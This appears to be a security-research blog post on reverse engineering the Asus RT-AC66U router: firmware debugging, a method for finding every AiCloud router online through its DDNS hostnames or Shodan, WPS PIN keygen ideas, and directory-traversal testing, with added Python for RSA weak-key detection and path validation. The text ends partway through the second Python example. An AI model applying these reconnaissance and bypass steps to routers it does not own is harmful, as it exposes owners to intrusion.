Most vendors (like Asus) won't open source their entire code base. You may need to reverse proprietary drivers and binary blobs in order to find some good vulns. ACSD is a particularly interesting binary because it was removed from newer firmware versions (v3.0.0.4.374.130+) due to a <a href="http://infosec42.blogspot.com/2013/07/exploit-asus-rt-ac66u-remote-root.html">vuln</a> disclosed by <a href="https://twitter.com/rootHak42">Jacob Holcomb</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuAFJiCtnNI6g0eFS7q3qP55x6PfqBecgmVfaxbbA1o2ZVqxHfbDQVUAVyq-w9OliKC9fxNw-69fTBCFVRERDM5nkMLkRGo8r_7osa9mWYgzCuYXfwEaOsrAB7T49QBI2429Qrj69GYuku/s1600/rem.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuAFJiCtnNI6g0eFS7q3qP55x6PfqBecgmVfaxbbA1o2ZVqxHfbDQVUAVyq-w9OliKC9fxNw-69fTBCFVRERDM5nkMLkRGo8r_7osa9mWYgzCuYXfwEaOsrAB7T49QBI2429Qrj69GYuku/s1600/rem.png" height="140" width="400" /></a></div>
<br />
The binaries are MIPS and little endian:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKoLOgG8ZG91MBDPvoCip36IJ1qcDQumxfbDynFFd7sXcWD4JxG1ryzOfW0yhP6iI2I4cp0x6mhGnAIZT-G-XYK9zw5uO2bdx7zEwTC35exXI9eqP9_GKX4vTexhCUgxtUY4DWf-h6a4Lq/s1600/Screenshot+from+2014-07-12+23%255E%252554%255E%252541.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKoLOgG8ZG91MBDPvoCip36IJ1qcDQumxfbDynFFd7sXcWD4JxG1ryzOfW0yhP6iI2I4cp0x6mhGnAIZT-G-XYK9zw5uO2bdx7zEwTC35exXI9eqP9_GKX4vTexhCUgxtUY4DWf-h6a4Lq/s1600/Screenshot+from+2014-07-12+23%255E%252554%255E%252541.png" height="232" width="400" /></a></div>
<br />
It's also important to learn more about the filesystem. The OpenWRT Wiki has a nice <a href="http://wiki.openwrt.org/doc/techref/flash.layout">article on Flash Layouts</a>. The Linux <a href="https://en.wikipedia.org/wiki/Memory_Technology_Device">MTD subsystem</a> provides access to the flash device, on top of which fully functional filesystems are created. SSH to the device and map the mount points and partitions:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX93wAg3NIiYWLaMUXcXgfFCduMHcs18tHWGrEg5r2pR6KITLxq9sLjWSJgdVIMdt9PKEHm36fkXZJG50EC9CcviaPHaU1pumAHBSPH0emmVf-9F-cSK1fxDxB-HX7O2G6ARSIBVLVdTGc/s1600/fs.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX93wAg3NIiYWLaMUXcXgfFCduMHcs18tHWGrEg5r2pR6KITLxq9sLjWSJgdVIMdt9PKEHm36fkXZJG50EC9CcviaPHaU1pumAHBSPH0emmVf-9F-cSK1fxDxB-HX7O2G6ARSIBVLVdTGc/s1600/fs.PNG" height="212" width="400" /></a></div>
<br />
The NVRAM partition is very valuable for us because it stores all the configuration parameters. We can view its content by dumping the corresponding partition (mtd1) or by issuing the "<i>nvram show</i>" command:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYvfqb2P00SmH3UesadOpkhrFzxZes039WFWB0Z5NPHvY1Y2loo-8mGV0-7H5KVtVsIBpih9wrGQpF1n1C7E0Ea27T0eNu1yIDP-WZO-KfRfTK0cNlki6gPMEEqZJEmYxu2F6kEWlUmbmp/s1600/dd1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYvfqb2P00SmH3UesadOpkhrFzxZes039WFWB0Z5NPHvY1Y2loo-8mGV0-7H5KVtVsIBpih9wrGQpF1n1C7E0Ea27T0eNu1yIDP-WZO-KfRfTK0cNlki6gPMEEqZJEmYxu2F6kEWlUmbmp/s1600/dd1.PNG" height="85" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVwdontK1K6eVmh94lgK9c47UJgPB4Xtx04q28ayQuveyd1EnQSaiC_0nd7PGPO6n5DpBj4_voTbx50OiT2gg6AUTwsiEf16IWSyAUyZbKTlxnjlJFQuxHgOvJxvjJ-3qBKcdq1k2wah9A/s1600/dd2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVwdontK1K6eVmh94lgK9c47UJgPB4Xtx04q28ayQuveyd1EnQSaiC_0nd7PGPO6n5DpBj4_voTbx50OiT2gg6AUTwsiEf16IWSyAUyZbKTlxnjlJFQuxHgOvJxvjJ-3qBKcdq1k2wah9A/s1600/dd2.PNG" height="156" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Another interesting partition is the bootloader (pmon). It contains some LZMA-compressed data, and the boot process provides a failsafe mechanism to recover from a bad flash.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJFGteHkkNNDRdDLWkvQFkvDNAnCf29UCwviVIAO9IRUJVSX0hVLMe242cJbqexZTC3p6fHhFxeydnlS-5N9nLFClXyKaAg2Dn5SatVviPiL2qGeFIs4Zt-J6kNSyMygfZfB5CiYX82R0l/s1600/x1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJFGteHkkNNDRdDLWkvQFkvDNAnCf29UCwviVIAO9IRUJVSX0hVLMe242cJbqexZTC3p6fHhFxeydnlS-5N9nLFClXyKaAg2Dn5SatVviPiL2qGeFIs4Zt-J6kNSyMygfZfB5CiYX82R0l/s1600/x1.png" height="273" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnWpDzip-A1RbjzF-HzDhKzYwm2jp5qFnbkVTrMVe2kIdh77fBUCSy2m-6ZX6ANm-yZ4hOXsCkEwL3mZ6FFxswiCh4gS41t9MVC6GymgziYh-pi1Vi0o8JQtfSuNb7VsV0zFYNGipwlXke/s1600/x2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnWpDzip-A1RbjzF-HzDhKzYwm2jp5qFnbkVTrMVe2kIdh77fBUCSy2m-6ZX6ANm-yZ4hOXsCkEwL3mZ6FFxswiCh4gS41t9MVC6GymgziYh-pi1Vi0o8JQtfSuNb7VsV0zFYNGipwlXke/s1600/x2.png" height="333" width="400" /></a></div>
<br />
<b>reverse</b><br />
<div>
<b><br /></b>
Time to start the reversing tasks. We need some basic tools like gdb, gdbserver and strace to start debugging the binaries: we can either cross-compile them or set up <a href="https://github.com/RMerl/asuswrt-merlin/wiki/Entware">Optware/Entware</a> to install prebuilt packages.<br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjbsqGMeZpCEU783gA-Ks7DrIB0De92oaRk0Ms70EEgS4TPFGfhj-_2hSJuRqW9sE13d_rHRB9_Q7Wzc79HEYNBn3zxeoan-HZ38GAMy-7hpeNGXaTv3diJWqhzXUVi9LD8ZwM-p5gc1-f/s1600/gdb.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjbsqGMeZpCEU783gA-Ks7DrIB0De92oaRk0Ms70EEgS4TPFGfhj-_2hSJuRqW9sE13d_rHRB9_Q7Wzc79HEYNBn3zxeoan-HZ38GAMy-7hpeNGXaTv3diJWqhzXUVi9LD8ZwM-p5gc1-f/s1600/gdb.PNG" height="220" width="400" /></a></div>
<div>
<br />
Wanduck (GPL_RT_AC66U_VER3004266/asuswrt/release/src/router/rc/wanduck.c) is an interesting process to analyze. It starts by default and binds a pseudo HTTP server on port 18017. The HTTP server redirects every request to the main administrative interface and, for some reason, it drops requests to URLs ending with ".ico".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju-0kw_0352-u-EIduRSwu3Jei4jHQgL6Y3bpXh-dgRFyd-fIh3SSOh56GOl7CulxfVoUGJfet7hcAS46QSbSAR3GAc6ydTphFycZqoOzya-9iaYaF3PN0bKsccEM0AriLuKUod7awaDZX/s1600/wando1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju-0kw_0352-u-EIduRSwu3Jei4jHQgL6Y3bpXh-dgRFyd-fIh3SSOh56GOl7CulxfVoUGJfet7hcAS46QSbSAR3GAc6ydTphFycZqoOzya-9iaYaF3PN0bKsccEM0AriLuKUod7awaDZX/s1600/wando1.png" height="321" width="400" /></a></div>
<br />
Let's find out why: start gdbserver on the remote target (gdbserver --multi localhost:12345 &) and connect to your debugger of choice. If you're using Ida Pro, open the binary "/sbin/wanduck" and set the processor type to "mipsrl".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7nY_9m13F8kui7B_IzqTLSzSFYimdkVpWNFW0oqF6TE5mQ_xpguX91MW_v7nO4Yex6zw_YeSzJkNcWrCsQm6YVRPJqcX4Tgwcj_30ipDmdr1q_86eolhhmzWJXB1HrWPELof7TPlWs_ZE/s1600/gdb2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7nY_9m13F8kui7B_IzqTLSzSFYimdkVpWNFW0oqF6TE5mQ_xpguX91MW_v7nO4Yex6zw_YeSzJkNcWrCsQm6YVRPJqcX4Tgwcj_30ipDmdr1q_86eolhhmzWJXB1HrWPELof7TPlWs_ZE/s1600/gdb2.PNG" height="95" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Navigate to the <i>handle_http_req</i> function and set a breakpoint on the <i>dst_url </i>comparison:<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8UPeJEGoANmSFJW1CsdRPwqQeAD7GiVG2MSeX2Goc46Zi-RWDEI9yxDDPuv50LlvFn4n-7PQFVKRli4EkamjU_MI0pNwcd0rGeh9R2R0d09pFhouKUHiC4Rc47Ov2ZNK8gIbD5x3bM_ZS/s1600/wandox.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8UPeJEGoANmSFJW1CsdRPwqQeAD7GiVG2MSeX2Goc46Zi-RWDEI9yxDDPuv50LlvFn4n-7PQFVKRli4EkamjU_MI0pNwcd0rGeh9R2R0d09pFhouKUHiC4Rc47Ov2ZNK8gIbD5x3bM_ZS/s1600/wandox.png" height="435" width="640" /></a></div>
<div>
<br /></div>
<div>
Enter the gdbserver's host and port under "Debugger / Process Options" and attach to the corresponding PID.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioHkbm8OLjjBNJwYYAyCVGtgfxne3SZOxhtV4sh5ODiTpXPBDMS9ep5gR8R2DrGt3Ho4V624IO6wB3qSPs0_-ecmUHq30TZoxgt7HEonXce20LX74THv8nmvRa3jeio3Z6ieQlEbsTY6pL/s1600/wando3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioHkbm8OLjjBNJwYYAyCVGtgfxne3SZOxhtV4sh5ODiTpXPBDMS9ep5gR8R2DrGt3Ho4V624IO6wB3qSPs0_-ecmUHq30TZoxgt7HEonXce20LX74THv8nmvRa3jeio3Z6ieQlEbsTY6pL/s1600/wando3.PNG" height="144" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOk4wrcpgRaaTC__wMsOevqN13ZORjjdzh-2vQmt9pEBCIhtdXxjF-ltHoC2C0AE0q1IMQca5x2WfOR6MhmFY_p7RBShSOiZ6qg7-7dzmBA3tKgpKP4z_cnYJOsDsOFlS-qOHWWPEISfTi/s1600/wando4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOk4wrcpgRaaTC__wMsOevqN13ZORjjdzh-2vQmt9pEBCIhtdXxjF-ltHoC2C0AE0q1IMQca5x2WfOR6MhmFY_p7RBShSOiZ6qg7-7dzmBA3tKgpKP4z_cnYJOsDsOFlS-qOHWWPEISfTi/s1600/wando4.PNG" height="94" width="320" /></a></div>
<br />
Resume the process (F9) and make an HTTP request to http://192.168.1.1/x.ico. The debugger will stop at the defined breakpoint and you can now inspect the registers and the memory.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCQhommGkXLT9P6dATrfDEgVsOVWrMAEWs7K465vJWavyEqCyYQwNWYdOvR-dyeXQcpICvqQpZBIfn12XdOd4clqj6LM3kFe9z4_CX8N8i9vzPDVoXC0FA81ghGL286iTRBeOqPIC66PnE/s1600/ida.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCQhommGkXLT9P6dATrfDEgVsOVWrMAEWs7K465vJWavyEqCyYQwNWYdOvR-dyeXQcpICvqQpZBIfn12XdOd4clqj6LM3kFe9z4_CX8N8i9vzPDVoXC0FA81ghGL286iTRBeOqPIC66PnE/s1600/ida.png" height="320" width="640" /></a></div>
<br />
If you want to find reverse engineering targets, search for folders named "<i>prebuilt</i>" under "GPL_RT_AC66U_VER3004266/asuswrt/release/src/router/". Some interesting binaries:<br />
<br />
- /acsd/prebuilt/acsd<br />
- /webdav_client/prebuilt/webdav_client<br />
- /asuswebstorage/prebuilt/asuswebstorage<br />
- /eapd/linux/prebuilt/eapd<br />
- /nas/nas/prebuilt/nas<br />
- /flash/prebuilt/flash<br />
- /et/prebuilt/et<br />
- /wps/prebuilt/wps_monitor<br />
- /ated/prebuilt/ated<br />
- /wlconf/prebuilt/wlconf<br />
<br />
The mobile AiCloud app might reveal some interesting information about how the device works. If you reverse the APK or use an intercepting proxy you can identify the app's initial HTTP request:<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMka8vzsD9OEC7Co-j1DefDUYHIbWl7PkNF2eJNI4-BwJSO1lGqmLTzwq75PHAPYmvfkA3dgNfAq-WGZJHeH8PCzoe44NzaxX2W9U8M2ec1Ns0lSrThKjBirglAm7rrELxbseGlS7FiG7w/s1600/aix2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMka8vzsD9OEC7Co-j1DefDUYHIbWl7PkNF2eJNI4-BwJSO1lGqmLTzwq75PHAPYmvfkA3dgNfAq-WGZJHeH8PCzoe44NzaxX2W9U8M2ec1Ns0lSrThKjBirglAm7rrELxbseGlS7FiG7w/s1600/aix2.png" height="320" width="192" /></a> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi67WDtNz51GS__puFqTmN71KjQO5fxqjW4tqBJE_-VWyaZ2dGhSltAaBTw99PSB1QLODVboi7rn6u9lLrnDpIMwiklhOmva279Xd7ibb0rWZkg5gFcvnnKbHc_3_5nEuUzriZGXTP-dLmE/s1600/aix.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi67WDtNz51GS__puFqTmN71KjQO5fxqjW4tqBJE_-VWyaZ2dGhSltAaBTw99PSB1QLODVboi7rn6u9lLrnDpIMwiklhOmva279Xd7ibb0rWZkg5gFcvnnKbHc_3_5nEuUzriZGXTP-dLmE/s1600/aix.png" height="320" width="192" /></a></div>
<div>
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBD6Ue7_U8JhgLuRb3Uiq1LsFmZdgKcxmWZE34hkSn-pwoIBk8-7pCgOluoLnDPtyc3ZBSANtiSV7h44_SIcJHC87vvfZbRrrZnGCdbb3AHI-5yO4QKyVRJ6LzAopY-cWko1RK4w8-7sHj/s1600/aicl.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBD6Ue7_U8JhgLuRb3Uiq1LsFmZdgKcxmWZE34hkSn-pwoIBk8-7pCgOluoLnDPtyc3ZBSANtiSV7h44_SIcJHC87vvfZbRrrZnGCdbb3AHI-5yO4QKyVRJ6LzAopY-cWko1RK4w8-7sHj/s1600/aicl.png" height="240" width="640" /></a></div>
<div>
<br /></div>
<div>
You see that strange <i>ddns_hostname</i>? That's a crypto task =)</div>
<div>
<br /></div>
<b>crypto</b><br />
<br />
The POST request tries to register a new Dynamic DNS using the asuscomm.com service. If we search for the term <i>asuscomm.com</i> on the RT-AC66U source code, we can easily find the function that generates this DDNS:<br />
<br />
<script src="https://gist.github.com/bmaia/5bad1648d4b2b9a54063.js"></script>
According to <a href="https://wikidevi.com/wiki/ASUS_RT-AC66U">WikiDevi</a>, the following OUIs are currently being used by the RT-AC66U:<br />
<br />
- 08:60:6E (1 E, 1 W, 2011)<br />
- 10:BF:48 (1 E, 2 W, 2011)<br />
- 30:85:A9 (3 E, 3 W, 2011)<br />
- 50:46:5D (1 E, 2 W, 2012)<br />
<br />
Using this information we can map the IP address for every single router using AiCloud. Let's generate a list of all the possible MAC addresses and brute force the hostnames using <a href="http://www.room362.com/blog/2014/01/29/hostname-bruteforcing-on-the-cheap/">this cool trick</a> from <a href="https://twitter.com/mubix">mubix</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqMENPHzDzoj8ymyws38d-Qj46UCbqun8o-3yzbMH_9fuZlxoyR6aMDB0sFYufwcKSs_APZxVpKfoqPeAilF7m8VXVwVfQfJxSu325ls502c_KVT0LQvGWxR0pKsYBsRY0HyPSOVMXnYoA/s1600/dns1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqMENPHzDzoj8ymyws38d-Qj46UCbqun8o-3yzbMH_9fuZlxoyR6aMDB0sFYufwcKSs_APZxVpKfoqPeAilF7m8VXVwVfQfJxSu325ls502c_KVT0LQvGWxR0pKsYBsRY0HyPSOVMXnYoA/s1600/dns1.png" height="262" width="400" /></a></div>
<br />
If you're too lazy to run these commands, you can simply search for <i>asuscomm.com</i> on <a href="http://www.shodanhq.com/">Shodan</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipv4GuZTGIEBf_r0OtWT1iNGZLfMMnY9XCMjTGRSwsVLk6QMblhSrSLmUgVVzRwuDUdfyKdsYEiYGpbkkvxroJFj2NjPkIDsV2qAP4tRxTs9jyyZ-zFd5t3IIhBmC7hmc8SpqOIyUh4iCB/s1600/shodan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipv4GuZTGIEBf_r0OtWT1iNGZLfMMnY9XCMjTGRSwsVLk6QMblhSrSLmUgVVzRwuDUdfyKdsYEiYGpbkkvxroJFj2NjPkIDsV2qAP4tRxTs9jyyZ-zFd5t3IIhBmC7hmc8SpqOIyUh4iCB/s1600/shodan.png" height="256" width="400" /></a></div>
<br />
AiCloud runs on ports 8082 and 443 by default. The fact that anyone can easily map the routers running this service could be very worrisome, <a href="http://www.securityfocus.com/archive/1/526942">right</a>?<br />
<br />
Another interesting crypto exercise is to reverse the algorithm used to generate the WPS device PIN. You can view the current PIN and secret_code by issuing the following command: <i>nvram show | grep -E "secret_code|wps_device_pin"</i>. Search for these variables in the source code and use this information to create your own WPS keygen (don't forget to include a chiptune from <a href="http://pouet.net/">pouet.net</a>).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5UzQQXpiP4Ligd0deYF_gCNDya5eoB1TzImdUO8W9Anz08-7egjexJW4aA6ce_rfIgUn2ec2hyGyyfzO2c8IuYsT1BaWYJB45JPTqwh06YNF8_aqEhiw7hTi8aUraPc3AUxtWguo7LCQj/s1600/search.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5UzQQXpiP4Ligd0deYF_gCNDya5eoB1TzImdUO8W9Anz08-7egjexJW4aA6ce_rfIgUn2ec2hyGyyfzO2c8IuYsT1BaWYJB45JPTqwh06YNF8_aqEhiw7hTi8aUraPc3AUxtWguo7LCQj/s1600/search.PNG" height="153" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNGjqKkVi86B7Ghx73clOADJzoBvieW9KmJCgAiRs7RJX6XdyltANMRCarWrLtXvRcRZuZ66UYk_EHxxCIgDWHR4UP7HidX9uaPEg5djGq9ZVy_7Wy6gH9DIPJYlBWbj9R5FtqVxGVky3A/s1600/generate.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNGjqKkVi86B7Ghx73clOADJzoBvieW9KmJCgAiRs7RJX6XdyltANMRCarWrLtXvRcRZuZ66UYk_EHxxCIgDWHR4UP7HidX9uaPEg5djGq9ZVy_7Wy6gH9DIPJYlBWbj9R5FtqVxGVky3A/s1600/generate.PNG" height="276" width="640" /></a></div>
<br />
You can also test the entropy of the crypto keys generated by the device. Check the slides from the "<a href="http://events.ccc.de/congress/2013/Fahrplan/system/attachments/2226/original/Scanning-30c3-13.pdf">Fast Internet-wide Scanning and its Security Applications</a>" talk to gather some ideas:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCy8YKFDcxzdKooSGxyd7QqKOK9_rmsuy8Ynr3ZtgDDB5zlix9ly5ZvO-iKNnE0xM-KxnOsYyR0ItKXQFpdH-veKmvpSWllIjG5O4iJHboMX5lSLYguZ79XFpGi6Y1HtZ5XmdAaCvjO30t/s1600/crypto.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCy8YKFDcxzdKooSGxyd7QqKOK9_rmsuy8Ynr3ZtgDDB5zlix9ly5ZvO-iKNnE0xM-KxnOsYyR0ItKXQFpdH-veKmvpSWllIjG5O4iJHboMX5lSLYguZ79XFpGi6Y1HtZ5XmdAaCvjO30t/s1600/crypto.PNG" height="271" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Slides from <a href="https://www.youtube.com/watch?v=K47MZIEXQEI">Fast Internet-wide Scanning and its Security Applications [30c3]</a></td></tr>
</tbody></table>
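The core of that research is the batch-GCD test for RSA moduli that share a prime. The following Python is an added example, not code from the slides or from the router firmware: it runs the product/remainder-tree batch GCD over a constructed toy key set (small, well-known primes standing in for the large primes of real keys) and reports which keys would be factored outright or are duplicated across devices.

```python
from math import gcd

# Constructed toy key set: small, well-known primes stand in for the large primes
# of real RSA keys so the arithmetic is instant and can be checked by hand.
P1, P2, P3, P4, P5, P6, P7 = 65537, 7919, 104729, 1299709, 15485863, 999983, 2147483647

DEVICE_MODULI = {
    "router-A": P1 * P2,  # shares P1 with router-B: both keys factor immediately
    "router-B": P1 * P3,
    "router-C": P4 * P5,  # identical to router-E: the same key on two devices
    "router-D": P6 * P7,  # unique primes: passes the test
    "router-E": P4 * P5,
}


def batch_gcd(moduli):
    """For each N_i return gcd(N_i, product of all the other moduli).

    Product tree up, remainder tree down (Bernstein's batch GCD), so the cost is
    quasi-linear instead of the quadratic pairwise gcd; this is how the cited
    Internet-wide scans test millions of keys in one pass.
    """
    levels = [list(moduli)]
    while len(levels[-1]) > 1:
        prev = levels[-1]
        levels.append([prev[i] * prev[i + 1] if i + 1 < len(prev) else prev[i]
                       for i in range(0, len(prev), 2)])
    remainders = [levels[-1][0]]              # root: product of everything
    for level in reversed(levels[:-1]):
        remainders = [remainders[i // 2] % (x * x) for i, x in enumerate(level)]
    # (P mod N^2) / N == (product of the others) mod N, so the gcd below is
    # exactly gcd(N, product of the others)
    return [gcd(x, r // x) for x, r in zip(moduli, remainders)]


def analyze_keys(moduli_by_name):
    """Classify each modulus as ok, factored (one shared prime) or fully shared."""
    names = list(moduli_by_name)
    moduli = [moduli_by_name[n] for n in names]
    report = {}
    for name, n, g in zip(names, moduli, batch_gcd(moduli)):
        if g == 1:
            report[name] = "ok"
        elif g == n:
            # Whole modulus divides the others' product: a duplicate key, or
            # both primes reused by different devices.
            report[name] = "all factors shared: duplicate key or both primes reused"
        else:
            report[name] = "factored: %d * %d" % (g, n // g)
    return report


if __name__ == "__main__":
    for name, verdict in analyze_keys(DEVICE_MODULI).items():
        print(name, verdict)
```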
<b>web</b><br />
<br />
There are so many things to test on the Web application that I'll focus on a few different approaches. The router's administrative interface has no CSRF protection. It has the traditional ping command injection and lots of XSS vectors.<br />
<br />
The HTTP daemon is based on microhttpd. It has some basic Directory Traversal Protection on httpd.c:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdOr3eMGSwtfzCVs2_nDt9ggEtdEZVEqTUGfa6obueUsz6ADH2W_pkbbrlb7FS0PW0noU6LT9C4Ig-6YbBOMxFPtO4k4vHKbNELseQVXrIiZJOAchQLYclZ2Q5DTOhE6pPwQNpNai5V2hB/s1600/trav1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdOr3eMGSwtfzCVs2_nDt9ggEtdEZVEqTUGfa6obueUsz6ADH2W_pkbbrlb7FS0PW0noU6LT9C4Ig-6YbBOMxFPtO4k4vHKbNELseQVXrIiZJOAchQLYclZ2Q5DTOhE6pPwQNpNai5V2hB/s1600/trav1.PNG" height="139" width="640" /></a></div>
<br />
We can shamelessly steal <a href="https://twitter.com/hackerfantastic">hackerfantastic</a>'s <a href="http://www.exploit-db.com/download_pdf/18094/">idea</a> and test for potential bypasses (there's an extensive <a href="https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/JHADDIX_LFI.txt">list of LFI tests</a> at <a href="https://github.com/danielmiessler/SecLists">Seclists</a>):<br />
<br />
<script src="https://gist.github.com/bmaia/bb787f8092a3a54303c0.js"></script><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfR_7MFcYS12brKyioxfeTJHYtpd-e5YkIRl7CtmLmpAWFLm2sAXHNBxK3WWazuBncotBaB01s8K04ZSxRazKkECr_qATNiUi0RleX9GGx6VwTEOsNkkYHwGm9a2QXuWVfU5T1VMDarr75/s1600/traversal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfR_7MFcYS12brKyioxfeTJHYtpd-e5YkIRl7CtmLmpAWFLm2sAXHNBxK3WWazuBncotBaB01s8K04ZSxRazKkECr_qATNiUi0RleX9GGx6VwTEOsNkkYHwGm9a2QXuWVfU5T1VMDarr75/s1600/traversal.png" height="261" width="400" /></a></div>
<br />
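As an added illustration, not the router's httpd.c (whose check is only visible in the screenshot above), the Python below contrasts a plain substring-style traversal check with a canonicalising one, run over a small constructed probe set in the spirit of the SecLists LFI list. The document root /www and the naive check are assumptions.

```python
from urllib.parse import unquote


def naive_rejects(raw_path):
    """Constructed stand-in for a substring-style check on the raw request path."""
    return ".." in raw_path


def canonical_request_path(raw_path, max_decode_rounds=3):
    """Return the normalised absolute path for a request, or None when unsafe.

    The steps correspond to the bypass classes found in LFI word lists:
    bounded repeated percent-decoding (double encoding such as %252e%252e),
    NUL truncation, backslash separators, and dot-segment resolution that
    refuses to climb above the document root.  The decision is made on the
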